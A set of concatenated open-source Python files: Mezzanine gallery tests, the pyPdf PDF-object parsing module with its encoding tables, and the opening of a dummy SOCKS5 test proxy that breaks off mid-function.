u'\xe0' # 0xE0 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe6' # 0xE6 -> LATIN SMALL LETTER AE
u'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe8' # 0xE8 -> LATIN SMALL LETTER E WITH GRAVE
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\xea' # 0xEA -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xec' # 0xEC -> LATIN SMALL LETTER I WITH GRAVE
u'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
u'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
u'\u011f' # 0xF0 -> LATIN SMALL LETTER G WITH BREVE
u'\xf1' # 0xF1 -> LATIN SMALL LETTER N WITH TILDE
u'\xf2' # 0xF2 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE
u'\xf9' # 0xF9 -> LATIN SMALL LETTER U WITH GRAVE
u'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
u'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u0131' # 0xFD -> LATIN SMALL LETTER DOTLESS I
u'\u015f' # 0xFE -> LATIN SMALL LETTER S WITH CEDILLA
u'\xff' # 0xFF -> LATIN SMALL LETTER Y WITH DIAERESIS
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| mit |
molokov/mezzanine | mezzanine/galleries/tests.py | 54 | 2140 | from __future__ import unicode_literals
from future.builtins import str
from future.utils import native
import os
from shutil import rmtree
from uuid import uuid4
from mezzanine.conf import settings
from mezzanine.core.templatetags.mezzanine_tags import thumbnail
from mezzanine.galleries.models import Gallery, GALLERIES_UPLOAD_DIR
from mezzanine.utils.tests import TestCase, copy_test_to_media
class GalleriesTests(TestCase):
def test_gallery_import(self):
"""
Test that a gallery creates images when given a zip file to
import, and that descriptions are created.
"""
zip_name = "gallery.zip"
copy_test_to_media("mezzanine.core", zip_name)
title = native(str(uuid4())) # i.e. Py3 str / Py2 unicode
gallery = Gallery.objects.create(title=title, zip_import=zip_name)
images = list(gallery.images.all())
self.assertTrue(images)
self.assertTrue(all([image.description for image in images]))
# Clean up.
rmtree(os.path.join(settings.MEDIA_ROOT,
GALLERIES_UPLOAD_DIR, title))
def test_thumbnail_generation(self):
"""
Test that a thumbnail is created and resized.
"""
try:
from PIL import Image
except ImportError:
return
image_name = "image.jpg"
size = (24, 24)
copy_test_to_media("mezzanine.core", image_name)
thumb_name = os.path.join(settings.THUMBNAILS_DIR_NAME, image_name,
image_name.replace(".", "-%sx%s." % size))
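# e.g. with THUMBNAILS_DIR_NAME set to "thumbs" (a hypothetical setting value),
# thumb_name is "thumbs/image.jpg/image-24x24.jpg"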
thumb_path = os.path.join(settings.MEDIA_ROOT, thumb_name)
thumb_image = thumbnail(image_name, *size)
self.assertEqual(os.path.normpath(thumb_image.lstrip("/")), thumb_name)
self.assertNotEqual(os.path.getsize(thumb_path), 0)
thumb = Image.open(thumb_path)
self.assertEqual(thumb.size, size)
# Clean up.
del thumb
os.remove(os.path.join(settings.MEDIA_ROOT, image_name))
os.remove(thumb_path)
rmtree(os.path.dirname(thumb_path))
| bsd-2-clause |
ahu-odoo/odoo | openerp/report/pyPdf/generic.py | 136 | 29129 | # vim: sw=4:expandtab:foldmethod=marker
#
# Copyright (c) 2006, Mathieu Fenniak
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Implementation of generic PDF objects (dictionary, number, string, and so on)
"""
__author__ = "Mathieu Fenniak"
__author_email__ = "[email protected]"
import re
from utils import readNonWhitespace, RC4_encrypt
import filters
import utils
import decimal
import codecs
def readObject(stream, pdf):
tok = stream.read(1)
stream.seek(-1, 1) # reset to start
if tok == 't' or tok == 'f':
# boolean object
return BooleanObject.readFromStream(stream)
elif tok == '(':
# string object
return readStringFromStream(stream)
elif tok == '/':
# name object
return NameObject.readFromStream(stream)
elif tok == '[':
# array object
return ArrayObject.readFromStream(stream, pdf)
elif tok == 'n':
# null object
return NullObject.readFromStream(stream)
elif tok == '<':
# hexadecimal string OR dictionary
peek = stream.read(2)
stream.seek(-2, 1) # reset to start
if peek == '<<':
return DictionaryObject.readFromStream(stream, pdf)
else:
return readHexStringFromStream(stream)
elif tok == '%':
# comment
while tok not in ('\r', '\n'):
tok = stream.read(1)
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
return readObject(stream, pdf)
else:
# number object OR indirect reference
if tok == '+' or tok == '-':
# number
return NumberObject.readFromStream(stream)
peek = stream.read(20)
stream.seek(-len(peek), 1) # reset to start
if re.match(r"(\d+)\s(\d+)\sR[^a-zA-Z]", peek) is not None:
return IndirectObject.readFromStream(stream, pdf)
else:
return NumberObject.readFromStream(stream)
class PdfObject(object):
def getObject(self):
"""Resolves indirect references."""
return self
class NullObject(PdfObject):
def writeToStream(self, stream, encryption_key):
stream.write("null")
def readFromStream(stream):
nulltxt = stream.read(4)
if nulltxt != "null":
raise utils.PdfReadError, "error reading null object"
return NullObject()
readFromStream = staticmethod(readFromStream)
class BooleanObject(PdfObject):
def __init__(self, value):
self.value = value
def writeToStream(self, stream, encryption_key):
if self.value:
stream.write("true")
else:
stream.write("false")
def readFromStream(stream):
word = stream.read(4)
if word == "true":
return BooleanObject(True)
elif word == "fals":
stream.read(1)
return BooleanObject(False)
assert False
readFromStream = staticmethod(readFromStream)
class ArrayObject(list, PdfObject):
def writeToStream(self, stream, encryption_key):
stream.write("[")
for data in self:
stream.write(" ")
data.writeToStream(stream, encryption_key)
stream.write(" ]")
def readFromStream(stream, pdf):
arr = ArrayObject()
tmp = stream.read(1)
if tmp != "[":
raise utils.PdfReadError, "error reading array"
while True:
# skip leading whitespace
tok = stream.read(1)
while tok.isspace():
tok = stream.read(1)
stream.seek(-1, 1)
# check for array ending
peekahead = stream.read(1)
if peekahead == "]":
break
stream.seek(-1, 1)
# read and append obj
arr.append(readObject(stream, pdf))
return arr
readFromStream = staticmethod(readFromStream)
class IndirectObject(PdfObject):
def __init__(self, idnum, generation, pdf):
self.idnum = idnum
self.generation = generation
self.pdf = pdf
def getObject(self):
return self.pdf.getObject(self).getObject()
def __repr__(self):
return "IndirectObject(%r, %r)" % (self.idnum, self.generation)
def __eq__(self, other):
return (
other is not None and
isinstance(other, IndirectObject) and
self.idnum == other.idnum and
self.generation == other.generation and
self.pdf is other.pdf
)
def __ne__(self, other):
return not self.__eq__(other)
def writeToStream(self, stream, encryption_key):
stream.write("%s %s R" % (self.idnum, self.generation))
def readFromStream(stream, pdf):
idnum = ""
while True:
tok = stream.read(1)
if tok.isspace():
break
idnum += tok
generation = ""
while True:
tok = stream.read(1)
if tok.isspace():
break
generation += tok
r = stream.read(1)
if r != "R":
raise utils.PdfReadError("error reading indirect object reference")
return IndirectObject(int(idnum), int(generation), pdf)
readFromStream = staticmethod(readFromStream)
class FloatObject(decimal.Decimal, PdfObject):
def __new__(cls, value="0", context=None):
return decimal.Decimal.__new__(cls, str(value), context)
def __repr__(self):
if self == self.to_integral():
return str(self.quantize(decimal.Decimal(1)))
else:
# XXX: this adds useless extraneous zeros.
return "%.5f" % self
def writeToStream(self, stream, encryption_key):
stream.write(repr(self))
class NumberObject(int, PdfObject):
def __init__(self, value):
int.__init__(value)
def writeToStream(self, stream, encryption_key):
stream.write(repr(self))
def readFromStream(stream):
name = ""
while True:
tok = stream.read(1)
if tok != '+' and tok != '-' and tok != '.' and not tok.isdigit():
stream.seek(-1, 1)
break
name += tok
if name.find(".") != -1:
return FloatObject(name)
else:
return NumberObject(name)
readFromStream = staticmethod(readFromStream)
##
# Given a string (either a "str" or "unicode"), create a ByteStringObject or a
# TextStringObject to represent the string.
def createStringObject(string):
if isinstance(string, unicode):
return TextStringObject(string)
elif isinstance(string, str):
if string.startswith(codecs.BOM_UTF16_BE):
retval = TextStringObject(string.decode("utf-16"))
retval.autodetect_utf16 = True
return retval
else:
# This is probably a big performance hit here, but we need to
# convert string objects into the text/unicode-aware version if
# possible... and the only way to check if that's possible is
# to try. Some strings are strings, some are just byte arrays.
try:
retval = TextStringObject(decode_pdfdocencoding(string))
retval.autodetect_pdfdocencoding = True
return retval
except UnicodeDecodeError:
return ByteStringObject(string)
else:
raise TypeError("createStringObject should have str or unicode arg")
def readHexStringFromStream(stream):
stream.read(1)
txt = ""
x = ""
while True:
tok = readNonWhitespace(stream)
if tok == ">":
break
x += tok
if len(x) == 2:
txt += chr(int(x, base=16))
x = ""
if len(x) == 1:
x += "0"
if len(x) == 2:
txt += chr(int(x, base=16))
return createStringObject(txt)
def readStringFromStream(stream):
tok = stream.read(1)
parens = 1
txt = ""
while True:
tok = stream.read(1)
if tok == "(":
parens += 1
elif tok == ")":
parens -= 1
if parens == 0:
break
elif tok == "\\":
tok = stream.read(1)
if tok == "n":
tok = "\n"
elif tok == "r":
tok = "\r"
elif tok == "t":
tok = "\t"
elif tok == "b":
tok = "\b"
elif tok == "f":
tok = "\f"
elif tok == "(":
tok = "("
elif tok == ")":
tok = ")"
elif tok == "\\":
tok = "\\"
elif tok.isdigit():
# "The number ddd may consist of one, two, or three
# octal digits; high-order overflow shall be ignored.
# Three octal digits shall be used, with leading zeros
# as needed, if the next character of the string is also
# a digit." (PDF reference 7.3.4.2, p 16)
for i in range(2):
ntok = stream.read(1)
if ntok.isdigit():
tok += ntok
else:
break
tok = chr(int(tok, base=8))
elif tok in "\n\r":
# This case is hit when a backslash followed by a line
# break occurs. If it's a multi-char EOL, consume the
# second character:
tok = stream.read(1)
if not tok in "\n\r":
stream.seek(-1, 1)
# Then don't add anything to the actual string, since this
# line break was escaped:
tok = ''
else:
raise utils.PdfReadError("Unexpected escaped string")
txt += tok
return createStringObject(txt)
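# Illustrative sketch (not part of the original module): exercising the two
# string readers above on in-memory streams. The literal-string case shows
# the octal escape handling quoted from the PDF reference above; both inputs
# are made up for this example.
def _string_parsing_example():
    from StringIO import StringIO
    # Hex string: "<48656C6C6F>" decodes to "Hello".
    assert readHexStringFromStream(StringIO("<48656C6C6F>")) == u"Hello"
    # Literal string: "\101" is an octal escape for "A", "\n" a newline escape.
    assert readStringFromStream(StringIO("(A\\101 line\\n)")) == u"AA line\n"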
##
# Represents a string object where the text encoding could not be determined.
# This occurs quite often, as the PDF spec doesn't provide an alternate way to
# represent strings -- for example, the encryption data stored in files (like
# /O) is clearly not text, but is still stored in a "String" object.
class ByteStringObject(str, PdfObject):
##
# For compatibility with TextStringObject.original_bytes. This method
# returns self.
original_bytes = property(lambda self: self)
def writeToStream(self, stream, encryption_key):
bytearr = self
if encryption_key:
bytearr = RC4_encrypt(encryption_key, bytearr)
stream.write("<")
stream.write(bytearr.encode("hex"))
stream.write(">")
##
# Represents a string object that has been decoded into a real unicode string.
# If read from a PDF document, this string appeared to match the
# PDFDocEncoding, or contained a UTF-16BE BOM mark to cause UTF-16 decoding to
# occur.
class TextStringObject(unicode, PdfObject):
autodetect_pdfdocencoding = False
autodetect_utf16 = False
##
# It is occasionally possible that a text string object gets created where
# a byte string object was expected due to the autodetection mechanism --
# if that occurs, this "original_bytes" property can be used to
# back-calculate what the original encoded bytes were.
original_bytes = property(lambda self: self.get_original_bytes())
def get_original_bytes(self):
# We're a text string object, but the library is trying to get our raw
# bytes. This can happen if we auto-detected this string as text, but
# we were wrong. It's pretty common. Return the original bytes that
# would have been used to create this object, based upon the autodetect
# method.
if self.autodetect_utf16:
return codecs.BOM_UTF16_BE + self.encode("utf-16be")
elif self.autodetect_pdfdocencoding:
return encode_pdfdocencoding(self)
else:
raise Exception("no information about original bytes")
def writeToStream(self, stream, encryption_key):
# Try to write the string out as a PDFDocEncoding encoded string. It's
# nicer to look at in the PDF file. Sadly, we take a performance hit
# here for trying...
try:
bytearr = encode_pdfdocencoding(self)
except UnicodeEncodeError:
bytearr = codecs.BOM_UTF16_BE + self.encode("utf-16be")
if encryption_key:
bytearr = RC4_encrypt(encryption_key, bytearr)
obj = ByteStringObject(bytearr)
obj.writeToStream(stream, None)
else:
stream.write("(")
for c in bytearr:
if not c.isalnum() and c != ' ':
stream.write("\\%03o" % ord(c))
else:
stream.write(c)
stream.write(")")
class NameObject(str, PdfObject):
delimiterCharacters = "(", ")", "<", ">", "[", "]", "{", "}", "/", "%"
def __init__(self, data):
str.__init__(data)
def writeToStream(self, stream, encryption_key):
stream.write(self)
def readFromStream(stream):
name = stream.read(1)
if name != "/":
raise utils.PdfReadError, "name read error"
while True:
tok = stream.read(1)
if tok.isspace() or tok in NameObject.delimiterCharacters:
stream.seek(-1, 1)
break
name += tok
return NameObject(name)
readFromStream = staticmethod(readFromStream)
class DictionaryObject(dict, PdfObject):
def __init__(self, *args, **kwargs):
if len(args) == 0:
self.update(kwargs)
elif len(args) == 1:
arr = args[0]
# If we're passed a list/tuple, make a dict out of it
if not hasattr(arr, "iteritems"):
newarr = {}
for k, v in arr:
newarr[k] = v
arr = newarr
self.update(arr)
else:
raise TypeError("dict expected at most 1 argument, got 3")
def update(self, arr):
# note, a ValueError halfway through copying values
# will leave half the values in this dict.
for k, v in arr.iteritems():
self.__setitem__(k, v)
def raw_get(self, key):
return dict.__getitem__(self, key)
def __setitem__(self, key, value):
if not isinstance(key, PdfObject):
raise ValueError("key must be PdfObject")
if not isinstance(value, PdfObject):
raise ValueError("value must be PdfObject")
return dict.__setitem__(self, key, value)
def setdefault(self, key, value=None):
if not isinstance(key, PdfObject):
raise ValueError("key must be PdfObject")
if not isinstance(value, PdfObject):
raise ValueError("value must be PdfObject")
return dict.setdefault(self, key, value)
def __getitem__(self, key):
return dict.__getitem__(self, key).getObject()
##
# Retrieves XMP (Extensible Metadata Platform) data relevant to the
# this object, if available.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
# @return Returns a {@link #xmp.XmpInformation XmlInformation} instance
# that can be used to access XMP metadata from the document. Can also
# return None if no metadata was found on the document root.
def getXmpMetadata(self):
metadata = self.get("/Metadata", None)
if metadata is None:
return None
metadata = metadata.getObject()
import xmp
if not isinstance(metadata, xmp.XmpInformation):
metadata = xmp.XmpInformation(metadata)
self[NameObject("/Metadata")] = metadata
return metadata
##
# Read-only property that accesses the {@link
# #DictionaryObject.getXmpData getXmpData} function.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
xmpMetadata = property(lambda self: self.getXmpMetadata(), None, None)
def writeToStream(self, stream, encryption_key):
stream.write("<<\n")
for key, value in self.items():
key.writeToStream(stream, encryption_key)
stream.write(" ")
value.writeToStream(stream, encryption_key)
stream.write("\n")
stream.write(">>")
def readFromStream(stream, pdf):
tmp = stream.read(2)
if tmp != "<<":
raise utils.PdfReadError, "dictionary read error"
data = {}
while True:
tok = readNonWhitespace(stream)
if tok == ">":
stream.read(1)
break
stream.seek(-1, 1)
key = readObject(stream, pdf)
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
value = readObject(stream, pdf)
if data.has_key(key):
# multiple definitions of key not permitted
raise utils.PdfReadError, "multiple definitions in dictionary"
data[key] = value
pos = stream.tell()
s = readNonWhitespace(stream)
if s == 's' and stream.read(5) == 'tream':
eol = stream.read(1)
# odd PDF file output has spaces after 'stream' keyword but before EOL.
# patch provided by Danial Sandler
while eol == ' ':
eol = stream.read(1)
assert eol in ("\n", "\r")
if eol == "\r":
# read \n after
stream.read(1)
# this is a stream object, not a dictionary
assert data.has_key("/Length")
length = data["/Length"]
if isinstance(length, IndirectObject):
t = stream.tell()
length = pdf.getObject(length)
stream.seek(t, 0)
data["__streamdata__"] = stream.read(length)
e = readNonWhitespace(stream)
ndstream = stream.read(8)
if (e + ndstream) != "endstream":
# (sigh) - the odd PDF file has a length that is too long, so
# we need to read backwards to find the "endstream" ending.
# ReportLab (unknown version) generates files with this bug,
# and Python users into PDF files tend to be our audience.
# we need to do this to correct the streamdata and chop off
# an extra character.
pos = stream.tell()
stream.seek(-10, 1)
end = stream.read(9)
if end == "endstream":
# we found it by looking back one character further.
data["__streamdata__"] = data["__streamdata__"][:-1]
else:
stream.seek(pos, 0)
raise utils.PdfReadError, "Unable to find 'endstream' marker after stream."
else:
stream.seek(pos, 0)
if data.has_key("__streamdata__"):
return StreamObject.initializeFromDictionary(data)
else:
retval = DictionaryObject()
retval.update(data)
return retval
readFromStream = staticmethod(readFromStream)
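# Illustrative sketch (not part of the original module): the dictionary type
# above only accepts PdfObject keys and values, and __getitem__ resolves the
# stored value via getObject() (assumed to be defined on PdfObject earlier in
# this module, returning the object itself for direct objects).
def _dictionary_example():
    d = DictionaryObject()
    d[NameObject("/Type")] = NameObject("/Catalog")
    assert d["/Type"] == "/Catalog"
    try:
        d[NameObject("/Bad")] = "not a PdfObject"  # plain str values are rejected
    except ValueError:
        pass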
class StreamObject(DictionaryObject):
def __init__(self):
self._data = None
self.decodedSelf = None
def writeToStream(self, stream, encryption_key):
self[NameObject("/Length")] = NumberObject(len(self._data))
DictionaryObject.writeToStream(self, stream, encryption_key)
del self["/Length"]
stream.write("\nstream\n")
data = self._data
if encryption_key:
data = RC4_encrypt(encryption_key, data)
stream.write(data)
stream.write("\nendstream")
def initializeFromDictionary(data):
if data.has_key("/Filter"):
retval = EncodedStreamObject()
else:
retval = DecodedStreamObject()
retval._data = data["__streamdata__"]
del data["__streamdata__"]
del data["/Length"]
retval.update(data)
return retval
initializeFromDictionary = staticmethod(initializeFromDictionary)
def flateEncode(self):
if self.has_key("/Filter"):
f = self["/Filter"]
if isinstance(f, ArrayObject):
f.insert(0, NameObject("/FlateDecode"))
else:
newf = ArrayObject()
newf.append(NameObject("/FlateDecode"))
newf.append(f)
f = newf
else:
f = NameObject("/FlateDecode")
retval = EncodedStreamObject()
retval[NameObject("/Filter")] = f
retval._data = filters.FlateDecode.encode(self._data)
return retval
class DecodedStreamObject(StreamObject):
def getData(self):
return self._data
def setData(self, data):
self._data = data
class EncodedStreamObject(StreamObject):
def __init__(self):
self.decodedSelf = None
def getData(self):
if self.decodedSelf:
# cached version of decoded object
return self.decodedSelf.getData()
else:
# create decoded object
decoded = DecodedStreamObject()
decoded._data = filters.decodeStreamData(self)
for key, value in self.items():
if not key in ("/Length", "/Filter", "/DecodeParms"):
decoded[key] = value
self.decodedSelf = decoded
return decoded._data
def setData(self, data):
raise utils.PdfReadError, "Creating EncodedStreamObject is not currently supported"
class RectangleObject(ArrayObject):
def __init__(self, arr):
# must have four points
assert len(arr) == 4
# automatically convert arr[x] into NumberObject(arr[x]) if necessary
ArrayObject.__init__(self, [self.ensureIsNumber(x) for x in arr])
def ensureIsNumber(self, value):
if not isinstance(value, (NumberObject, FloatObject)):
value = FloatObject(value)
return value
def __repr__(self):
return "RectangleObject(%s)" % repr(list(self))
def getLowerLeft_x(self):
return self[0]
def getLowerLeft_y(self):
return self[1]
def getUpperRight_x(self):
return self[2]
def getUpperRight_y(self):
return self[3]
def getUpperLeft_x(self):
return self.getLowerLeft_x()
def getUpperLeft_y(self):
return self.getUpperRight_y()
def getLowerRight_x(self):
return self.getUpperRight_x()
def getLowerRight_y(self):
return self.getLowerLeft_y()
def getLowerLeft(self):
return self.getLowerLeft_x(), self.getLowerLeft_y()
def getLowerRight(self):
return self.getLowerRight_x(), self.getLowerRight_y()
def getUpperLeft(self):
return self.getUpperLeft_x(), self.getUpperLeft_y()
def getUpperRight(self):
return self.getUpperRight_x(), self.getUpperRight_y()
def setLowerLeft(self, value):
self[0], self[1] = [self.ensureIsNumber(x) for x in value]
def setLowerRight(self, value):
self[2], self[1] = [self.ensureIsNumber(x) for x in value]
def setUpperLeft(self, value):
self[0], self[3] = [self.ensureIsNumber(x) for x in value]
def setUpperRight(self, value):
self[2], self[3] = [self.ensureIsNumber(x) for x in value]
def getWidth(self):
return self.getUpperRight_x() - self.getLowerLeft_x()
def getHeight(self):
        return self.getUpperRight_y() - self.getLowerLeft_y()
lowerLeft = property(getLowerLeft, setLowerLeft, None, None)
lowerRight = property(getLowerRight, setLowerRight, None, None)
upperLeft = property(getUpperLeft, setUpperLeft, None, None)
upperRight = property(getUpperRight, setUpperRight, None, None)
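# Illustrative sketch (not part of the original module): a US-Letter sized
# media box using the accessors defined above; the page dimensions are an
# assumed example value.
def _rectangle_example():
    box = RectangleObject([0, 0, 612, 792])
    assert box.getWidth() == 612
    assert box.getHeight() == 792
    assert box.upperRight == (612, 792)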
def encode_pdfdocencoding(unicode_string):
retval = ''
for c in unicode_string:
try:
retval += chr(_pdfDocEncoding_rev[c])
except KeyError:
raise UnicodeEncodeError("pdfdocencoding", c, -1, -1,
"does not exist in translation table")
return retval
def decode_pdfdocencoding(byte_array):
retval = u''
for b in byte_array:
c = _pdfDocEncoding[ord(b)]
if c == u'\u0000':
raise UnicodeDecodeError("pdfdocencoding", b, -1, -1,
"does not exist in translation table")
retval += c
return retval
_pdfDocEncoding = (
u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000',
u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000',
u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000', u'\u0000',
u'\u02d8', u'\u02c7', u'\u02c6', u'\u02d9', u'\u02dd', u'\u02db', u'\u02da', u'\u02dc',
u'\u0020', u'\u0021', u'\u0022', u'\u0023', u'\u0024', u'\u0025', u'\u0026', u'\u0027',
u'\u0028', u'\u0029', u'\u002a', u'\u002b', u'\u002c', u'\u002d', u'\u002e', u'\u002f',
u'\u0030', u'\u0031', u'\u0032', u'\u0033', u'\u0034', u'\u0035', u'\u0036', u'\u0037',
u'\u0038', u'\u0039', u'\u003a', u'\u003b', u'\u003c', u'\u003d', u'\u003e', u'\u003f',
u'\u0040', u'\u0041', u'\u0042', u'\u0043', u'\u0044', u'\u0045', u'\u0046', u'\u0047',
u'\u0048', u'\u0049', u'\u004a', u'\u004b', u'\u004c', u'\u004d', u'\u004e', u'\u004f',
u'\u0050', u'\u0051', u'\u0052', u'\u0053', u'\u0054', u'\u0055', u'\u0056', u'\u0057',
u'\u0058', u'\u0059', u'\u005a', u'\u005b', u'\u005c', u'\u005d', u'\u005e', u'\u005f',
u'\u0060', u'\u0061', u'\u0062', u'\u0063', u'\u0064', u'\u0065', u'\u0066', u'\u0067',
u'\u0068', u'\u0069', u'\u006a', u'\u006b', u'\u006c', u'\u006d', u'\u006e', u'\u006f',
u'\u0070', u'\u0071', u'\u0072', u'\u0073', u'\u0074', u'\u0075', u'\u0076', u'\u0077',
u'\u0078', u'\u0079', u'\u007a', u'\u007b', u'\u007c', u'\u007d', u'\u007e', u'\u0000',
u'\u2022', u'\u2020', u'\u2021', u'\u2026', u'\u2014', u'\u2013', u'\u0192', u'\u2044',
u'\u2039', u'\u203a', u'\u2212', u'\u2030', u'\u201e', u'\u201c', u'\u201d', u'\u2018',
u'\u2019', u'\u201a', u'\u2122', u'\ufb01', u'\ufb02', u'\u0141', u'\u0152', u'\u0160',
u'\u0178', u'\u017d', u'\u0131', u'\u0142', u'\u0153', u'\u0161', u'\u017e', u'\u0000',
u'\u20ac', u'\u00a1', u'\u00a2', u'\u00a3', u'\u00a4', u'\u00a5', u'\u00a6', u'\u00a7',
u'\u00a8', u'\u00a9', u'\u00aa', u'\u00ab', u'\u00ac', u'\u0000', u'\u00ae', u'\u00af',
u'\u00b0', u'\u00b1', u'\u00b2', u'\u00b3', u'\u00b4', u'\u00b5', u'\u00b6', u'\u00b7',
u'\u00b8', u'\u00b9', u'\u00ba', u'\u00bb', u'\u00bc', u'\u00bd', u'\u00be', u'\u00bf',
u'\u00c0', u'\u00c1', u'\u00c2', u'\u00c3', u'\u00c4', u'\u00c5', u'\u00c6', u'\u00c7',
u'\u00c8', u'\u00c9', u'\u00ca', u'\u00cb', u'\u00cc', u'\u00cd', u'\u00ce', u'\u00cf',
u'\u00d0', u'\u00d1', u'\u00d2', u'\u00d3', u'\u00d4', u'\u00d5', u'\u00d6', u'\u00d7',
u'\u00d8', u'\u00d9', u'\u00da', u'\u00db', u'\u00dc', u'\u00dd', u'\u00de', u'\u00df',
u'\u00e0', u'\u00e1', u'\u00e2', u'\u00e3', u'\u00e4', u'\u00e5', u'\u00e6', u'\u00e7',
u'\u00e8', u'\u00e9', u'\u00ea', u'\u00eb', u'\u00ec', u'\u00ed', u'\u00ee', u'\u00ef',
u'\u00f0', u'\u00f1', u'\u00f2', u'\u00f3', u'\u00f4', u'\u00f5', u'\u00f6', u'\u00f7',
u'\u00f8', u'\u00f9', u'\u00fa', u'\u00fb', u'\u00fc', u'\u00fd', u'\u00fe', u'\u00ff'
)
assert len(_pdfDocEncoding) == 256
_pdfDocEncoding_rev = {}
for i in xrange(256):
char = _pdfDocEncoding[i]
if char == u"\u0000":
continue
assert char not in _pdfDocEncoding_rev
_pdfDocEncoding_rev[char] = i
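# Illustrative sketch (not part of the original module): a round trip through
# the PDFDocEncoding helpers defined above, using the translation tables that
# have just been built. The sample text is an assumption for this example.
def _pdfdocencoding_example():
    encoded = encode_pdfdocencoding(u"Hello, world")
    assert encoded == "Hello, world"  # ASCII maps onto itself
    assert decode_pdfdocencoding(encoded) == u"Hello, world"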
| agpl-3.0 |
namuyan/kumacoin | test/functional/test_framework/socks5.py | 18 | 5690 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Dummy Socks5 server for testing."""
import socket
import threading
import queue
import logging
logger = logging.getLogger("TestFramework.socks5")
# Protocol constants
class Command:
CONNECT = 0x01
class AddressType:
IPV4 = 0x01
DOMAINNAME = 0x03
IPV6 = 0x04
# Utility functions
def recvall(s, n):
"""Receive n bytes from a socket, or fail."""
rv = bytearray()
while n > 0:
d = s.recv(n)
if not d:
raise IOError('Unexpected end of stream')
rv.extend(d)
n -= len(d)
return rv
# Implementation classes
class Socks5Configuration():
"""Proxy configuration."""
def __init__(self):
self.addr = None # Bind address (must be set)
self.af = socket.AF_INET # Bind address family
self.unauth = False # Support unauthenticated
self.auth = False # Support authentication
class Socks5Command():
"""Information about an incoming socks5 command."""
def __init__(self, cmd, atyp, addr, port, username, password):
self.cmd = cmd # Command (one of Command.*)
self.atyp = atyp # Address type (one of AddressType.*)
self.addr = addr # Address
self.port = port # Port to connect to
self.username = username
self.password = password
def __repr__(self):
return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
class Socks5Connection():
def __init__(self, serv, conn, peer):
self.serv = serv
self.conn = conn
self.peer = peer
def handle(self):
"""Handle socks5 request according to RFC192."""
try:
# Verify socks version
ver = recvall(self.conn, 1)[0]
if ver != 0x05:
raise IOError('Invalid socks version %i' % ver)
# Choose authentication method
nmethods = recvall(self.conn, 1)[0]
methods = bytearray(recvall(self.conn, nmethods))
method = None
if 0x02 in methods and self.serv.conf.auth:
method = 0x02 # username/password
elif 0x00 in methods and self.serv.conf.unauth:
method = 0x00 # unauthenticated
if method is None:
raise IOError('No supported authentication method was offered')
# Send response
self.conn.sendall(bytearray([0x05, method]))
# Read authentication (optional)
username = None
password = None
if method == 0x02:
ver = recvall(self.conn, 1)[0]
if ver != 0x01:
raise IOError('Invalid auth packet version %i' % ver)
